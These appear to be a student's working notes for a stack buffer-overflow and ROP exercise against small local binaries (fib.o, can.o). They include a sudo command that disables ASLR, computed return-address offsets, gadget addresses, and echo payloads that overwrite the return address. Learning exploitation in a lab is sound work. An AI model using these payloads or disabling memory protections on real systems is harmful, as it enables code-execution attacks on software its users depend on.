sudo bash -c 'echo "0" > /proc/sys/kernel/randomize_va_space'
cat /proc/sys/kernel/randomize_va_space

Address of fib():
0x400685 -> 0x0000000000400685
\x85\x06\x40\x00\x00\x00\x00\x00

Byte-Offset to return-Address:
16 Bytes (rounded var-space) + 8 Bytes (Basepointer)
= 24 Bytes Offset

ropgadget:
0x004007d3 -> 0x00000000004007d3
\xd3\x07\x40\x00\x00\x00\x00\x00

bigger int-value: 0x10 = 16
0x7fffff0300a8-> 0x00007fffff0300a8
\xa8\x00\x03\xff\xff\x7f\x00\x00

bigger int-value: 0xA = 10
0x7fffff033ea8 -> 0x00007fffff033ea8
\xa8\x3e\x03\xff\xff\x7f\x00\x00

-> echo -e 'AAAAAAAABBBBBBBBCCCCCCCC\xd3\x09\x40\x00\x00\x00\x00\x00\x02\x00\x00\x00AAAA\x50\x09\x40\x00\x00\x00\x00\x00' | ./fib.o

echo -e 'AAAAAAAABBBBBBBBCCCCCCCC\x83\x09\x40\x00\x00\x00\x00\x00\x10\x00\x00\x00AAAA\xe9\x08\x40\x00\x00\x00\x00\x00' | ./fib.o

echo -e "5" | ./fib.o

\xd8\x08\x40\x00\x00\x00\x00\x00	-> 0xd808400000000000 -> 0x00000000004008d8 // fib(), printf(), usw.
\x14\x00\x00\x00AAAA			-> 0x1400000041414141 -> 0x4141414100000014 // Wert 20 (INT)
\x53\x09\x40\x00\x00\x00\x00\x00 	-> 0x5309400000000000 -> 0x0000000000400953 // pop rdi, ret
CCCCCCCC				-> 0x4343434343434343
BBBBBBBB				-> 0x4242424242424242
AAAAAAAA				-> 0x4141414141414141

char buffer[8];
int n;




\x00\x41\xff\xff\x7f\x00\x00\x00

echo -e 'AAAAAAAABBBBBBBBCCCCCCCC\xd6\x08\x40\x00\x00\x00\x00\x00\xd8\x08\x40\x00\x00\x00\x00\x00' | ./fib.o
\x1f\x03\x03\xff\xff\x7f\x00\x00

echo -e 'AAAAAAAABBBBBBBBCCCCCCCC\xd6\x08\x40\x00\x00\x00\x00\x00' | ./fib.o
\xd8\x08\x40\x00\x00\x00\x00\x00' | ./fib.o


0x00000000004008b5	\xb5\x08\x40\x00\x00\x00\x00\x00
0x00000000004008ba	\xba\x08\x40\x00\x00\x00\x00\x00
0x00000000004008be	\xbe\x08\x40\x00\x00\x00\x00\x00
0x00000000004008c1	\xc1\x08\x40\x00\x00\x00\x00\x00
0x00000000004008c4	\xc4\x08\x40\x00\x00\x00\x00\x00

0x00000000004008d3	\xd3\x08\x40\x00\x00\x00\x00\x00
0x00000000004008d6	\xd6\x08\x40\x00\x00\x00\x00\x00
0x00000000004008d8	\xd8\x08\x40\x00\x00\x00\x00\x00

echo -e 'AAAAAAAABBBBBBBBCCCCCCCC\xb5\x08\x40\x00\x00\x00\x00\x00\xba\x08\x40\x00\x00\x00\x00\x00\xbe\x08\x40\x00\x00\x00\x00\x00\xc1\x08\x40\x00\x00\x00\x00\x00\xc4\x08\x40\x00\x00\x00\x00\x00\xd3\x08\x40\x00\x00\x00\x00\x00\xd6\x08\x40\x00\x00\x00\x00\x00\xd8\x08\x40\x00\x00\x00\x00\x00' > buffer


echo -e 'AAAAAAAABBBBBBBBCCCCCCCC\xd8\x08\x40\x00\x00\x00\x00\x00' | ./fib.o

echo -e 'AAAABBBBCCCC\x39\x30\x00\x00AAAAAAAA\x0d\x06\x40\x00\x00\x00\x00\x00\x00' | ./can.o